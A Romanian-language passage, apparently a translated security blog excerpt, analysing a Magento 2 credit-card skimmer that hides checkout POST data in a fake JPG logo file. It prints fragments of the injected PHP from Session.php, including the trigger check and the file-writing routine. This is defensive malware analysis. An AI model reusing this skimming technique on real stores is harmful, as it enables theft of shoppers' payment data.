Actorii răi folosesc adesea tehnici creative pentru a ascunde un comportament rău intenționat și pentru a culege informații sensibile de pe site-urile de comerț electronic .
O investigație recentă pentru un site Web Magento 2 compromis a dezvăluit o injecție rău intenționată care captura date de solicitare POST de la vizitatorii site-ului. Situat pe pagina de plată, s-a observat că codifică datele capturate înainte de a le salva într-un fișier .JPG.
Comportament de injecție rău intenționat
Următorul cod PHP a fost găsit injectat în fișier ./vendor/magento/module-customer/Model/Session.php. Pentru a încărca restul codului rău intenționat în mediul compromis, funcția getAuthenticates este creată și apelată.
...
public function getAuthenticates($request)
{
if(empty($request->getPostValue('Custom'.'Method')))
return $this;
$docroot = BP . "/";
$sid = $request->getPostValue('Custom'.'Method');
if($sid != 'init' && $sid != 'LnByg' && $sid != 'LnByd') return $this;Codul creează și fișierul imagine (pub / media / tmp / design / file / default_luma_logo.jpg), pe care îl folosește pentru a stoca orice date capturate. Această caracteristică îi permite atacatorului să acceseze și să descarce cu ușurință informațiile furate după bunul plac, ascunzându-le într-un JPG aparent benign.
$docroot = BP . "/";
$sid = $request->getPostValue('Custom'.'Method');
if($sid != 'init' && $sid != 'LnByg' && $sid != 'LnByd') return $this;
$fname = $docroot.'pub/media/tmp/design/file/default_luma_logo.jpg';
try {
if(!file_exists($fname)){
$fhandle = fopen($fname,'w');fclose($fhandle);
}
$fhandle = fopen($fname,'r');$content = @fread($fhandle,filesize($fname));fclose($fhandle);
...Recoltarea detaliilor cardului de credit…
Continuarea aici: Magento 2: Skimmerii salvează în JPG cardurile de credit